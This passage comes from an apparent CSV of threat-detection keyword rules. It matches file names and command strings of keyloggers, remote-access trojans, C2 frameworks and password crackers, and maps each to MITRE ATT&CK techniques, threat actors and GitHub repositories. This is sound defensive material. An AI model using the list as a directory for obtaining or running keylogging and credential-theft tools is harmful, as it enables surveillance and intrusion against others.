Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","50381" "*KernelMii.x86.o*",".{0,1000}KernelMii\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - 
menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","50382" "*Kernel-Suite-Downgrade/Config.xml*",".{0,1000}Kernel\-Suite\-Downgrade\/Config\.xml.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","50383" "*kevin.tellier@synacktiv.com*",".{0,1000}kevin\.tellier\@synacktiv\.com.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","#email","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","50384" "*KevinJClark/badrats*",".{0,1000}KevinJClark\/badrats.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","50385" "*Kevin-Robertson/Inveigh*",".{0,1000}Kevin\-Robertson\/Inveigh.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","50386" 
"*KexMnyvBHcpAfniIdwPEXIgPdlxiUNMrYkSMrnXcdVOYYeoscIbuQssBxijBANhu*",".{0,1000}KexMnyvBHcpAfniIdwPEXIgPdlxiUNMrYkSMrnXcdVOYYeoscIbuQssBxijBANhu.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","50387" "*key*kda47y298uned*",".{0,1000}key.{0,1000}kda47y298uned.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","50388" "*Key`logger running in background*",".{0,1000}Key\`logger\srunning\sin\sbackground.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","50389" "*keychain2john.py*",".{0,1000}keychain2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50390" "*keylistattack.py*",".{0,1000}keylistattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50391" "*keylog_dump*",".{0,1000}keylog_dump.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","50392" "*keylog_dump*",".{0,1000}keylog_dump.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","50393" "*keylog_inject *",".{0,1000}keylog_inject\s.{0,1000}","offensive_tool_keyword","mythic","A .NET 
Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","50394" "*keylog_inject.py*",".{0,1000}keylog_inject\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","50395" "*keylog_off*",".{0,1000}keylog_off.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","50396" "*keylog_on*",".{0,1000}keylog_on.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","50397" "*keylog_recorder.*",".{0,1000}keylog_recorder\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50398" "*keylog_recorder.rb*",".{0,1000}keylog_recorder\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50399" "*keylog_start*",".{0,1000}keylog_start.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","50400" "*keylog_stop*",".{0,1000}keylog_stop.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","50401" "*KeyLogger data received*",".{0,1000}KeyLogger\sdata\sreceived.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","50402" "*keylogger 
dump*",".{0,1000}keylogger\sdump.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","N/A","10","792","162","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z","50403" "*Keylogger Exception - *",".{0,1000}Keylogger\sException\s\-\s.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","50404" "*keylogger is already off*",".{0,1000}keylogger\sis\salready\soff.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","50405" "*Keylogger started*",".{0,1000}Keylogger\sstarted.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","50406" "*Keylogger 
starting...*",".{0,1000}Keylogger\sstarting\.\.\..{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","50407" "*keylogger stopped*",".{0,1000}keylogger\sstopped.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","50408" "*Keylogger stopping...*",".{0,1000}Keylogger\sstopping\.\.\..{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","50409" "*Keylogger*",".{0,1000}Keylogger.{0,1000}","offensive_tool_keyword","keylogger","keylogger keyword. 
could be related to keylogger tools ","T1056.001 ","TA0006","N/A","N/A","Sniffing & Spoofing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50410" "*Keylogger.cs*",".{0,1000}Keylogger\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","50411" "*Keylogger.csproj*",".{0,1000}Keylogger\.csproj.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","0","N/A","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","50412" "*keylogger.dll*",".{0,1000}keylogger\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","50413" "*KeyLogger.dll*",".{0,1000}KeyLogger\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","50414" "*Keylogger.exe*",".{0,1000}Keylogger\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","50415" "*Keylogger.exe*",".{0,1000}Keylogger\.exe.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","1","N/A","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","50416" "*Keylogger.java*",".{0,1000}Keylogger\.java.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","50417" "*Keylogger.My*",".{0,1000}Keylogger\.My.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","50418" "*Keylogger.pdb*",".{0,1000}Keylogger\.pdb.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote 
tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","50419" "*Keylogger.ps1*",".{0,1000}Keylogger\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","50420" "*Keylogger.ps1*",".{0,1000}Keylogger\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","50421" "*Keylogger.ps1*",".{0,1000}Keylogger\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","50422" "*keylogger.py*",".{0,1000}keylogger\.py.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote 
Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","50423" "*keylogger.py*",".{0,1000}keylogger\.py.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","50424" "*keylogger.x64.dll*",".{0,1000}keylogger\.x64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","50425" "*keylogger_output_*.txt*",".{0,1000}keylogger_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","50426" "*KeyLoggerOffline.dll*",".{0,1000}KeyLoggerOffline\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","50427" "*keylogrecorder.rb*",".{0,1000}keylogrecorder\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50428" "*keylooger.ps1*",".{0,1000}keylooger\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource 
Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","50429" "*keyring2john.py*",".{0,1000}keyring2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50430" "*keyscan dump*",".{0,1000}keyscan\sdump.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","50431" "*keyscan start*",".{0,1000}keyscan\sstart.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","50432" "*keyscan stop*",".{0,1000}keyscan\sstop.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","50433" "*keystedx765ore*",".{0,1000}keystedx765ore.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma 
